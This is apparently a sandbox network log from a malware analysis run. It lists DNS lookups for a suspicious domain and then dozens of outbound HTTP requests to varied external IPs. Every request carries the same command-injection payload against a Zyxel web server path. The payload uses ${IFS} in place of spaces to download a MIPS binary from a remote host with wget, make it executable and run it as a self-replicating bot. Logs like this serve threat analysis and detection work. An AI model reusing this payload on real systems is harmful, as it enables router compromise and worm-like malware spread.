                                                  Jan 19, 2024 18:24:35.508358955 CET192.168.2.138.8.8.80xd8c7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:39.267843008 CET192.168.2.138.8.8.80xd39Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:45.030970097 CET192.168.2.138.8.8.80xe52cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:50.788276911 CET192.168.2.138.8.8.80xd7d0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:53.553505898 CET192.168.2.138.8.8.80xb7c7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:25:03.313641071 CET192.168.2.138.8.8.80x3e2fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:25:06.081361055 CET192.168.2.138.8.8.80x6231Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 19, 2024 18:23:01.512949944 CET8.8.8.8192.168.2.130xfbc5No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:06.274852991 CET8.8.8.8192.168.2.130x29c4No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:09.046348095 CET8.8.8.8192.168.2.130xf5a0No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:16.815093994 CET8.8.8.8192.168.2.130x7b1cNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:22.574285984 CET8.8.8.8192.168.2.130xc141No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:33.342516899 CET8.8.8.8192.168.2.130x9a99No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:42.113929987 CET8.8.8.8192.168.2.130xe2eNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:43.874152899 CET8.8.8.8192.168.2.130x5fafNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:51.635015965 CET8.8.8.8192.168.2.130xd30eNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:00.397588968 CET8.8.8.8192.168.2.130x7a35No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:11.156636000 CET8.8.8.8192.168.2.130xdb8fNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:19.919029951 CET8.8.8.8192.168.2.130x7fc4No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:29.079969883 CET8.8.8.8192.168.2.130x415eNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:31.842720032 CET8.8.8.8192.168.2.130xb8e6No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:35.612274885 CET8.8.8.8192.168.2.130xd8c7No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:39.371572971 CET8.8.8.8192.168.2.130xd39No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:45.134754896 CET8.8.8.8192.168.2.130xe52cNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:50.891648054 CET8.8.8.8192.168.2.130xd7d0No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:53.658011913 CET8.8.8.8192.168.2.130xb7c7No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:25:03.416896105 CET8.8.8.8192.168.2.130x3e2fNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  0192.168.2.1341554194.42.201.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515431881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.1335812212.12.213.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515486002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192.168.2.1357170219.127.29.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515512943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192.168.2.1354318163.161.162.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515614033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192.168.2.1353864174.172.95.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515659094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.1355984165.119.142.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515739918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192.168.2.1354264165.151.191.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515779018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192.168.2.1345306134.191.192.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515825987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192.168.2.1333240200.97.47.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.515898943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192.168.2.1360018166.128.83.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516127110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192.168.2.133939051.112.62.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516163111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.134834891.75.223.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516195059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.1360000189.63.229.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516208887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.1346472202.150.194.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516244888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192.168.2.135250839.163.202.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516310930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.1334726169.226.47.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516417980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.1355544125.68.250.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516486883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192.168.2.136093277.249.213.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516536951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192.168.2.135749675.45.84.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516582012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192.168.2.134268635.125.19.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516648054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20192.168.2.1350560198.63.168.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516679049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21192.168.2.1334354119.182.143.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516772985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  22192.168.2.1342598203.121.62.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516808987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  23192.168.2.135352873.89.115.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516920090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  24192.168.2.133385494.183.14.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.516976118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  25192.168.2.1354854157.195.209.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517065048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  26192.168.2.133952019.70.114.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517118931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  27192.168.2.134848293.101.222.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517174959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  28192.168.2.133395017.53.251.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517199039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  29192.168.2.134986613.191.128.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517635107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  30192.168.2.1357668221.217.113.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517656088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  31192.168.2.133485871.154.116.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517694950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.1342508171.18.234.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517751932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  33192.168.2.134647818.39.17.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517807007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.134421669.155.202.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517901897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.1346714213.235.230.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.517950058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  36192.168.2.13363645.29.105.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518055916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.134086472.124.179.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518120050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.133607625.153.41.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518193960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.134153650.44.222.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518222094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.1333346129.88.161.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518331051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.13389305.132.161.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518371105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  42192.168.2.1353402162.151.134.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518481970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.1333424173.42.55.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518528938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.1352714180.143.44.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518613100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.1348998156.237.127.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518649101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.1352388189.48.1.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518680096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.134129242.209.13.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518789053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  48192.168.2.135389471.79.178.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518851042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.1344228211.14.204.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518898964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.1341150205.60.16.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.518944025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.134317041.197.183.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519042015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.1352922181.179.70.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519109964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.1355600198.227.216.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.519222975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


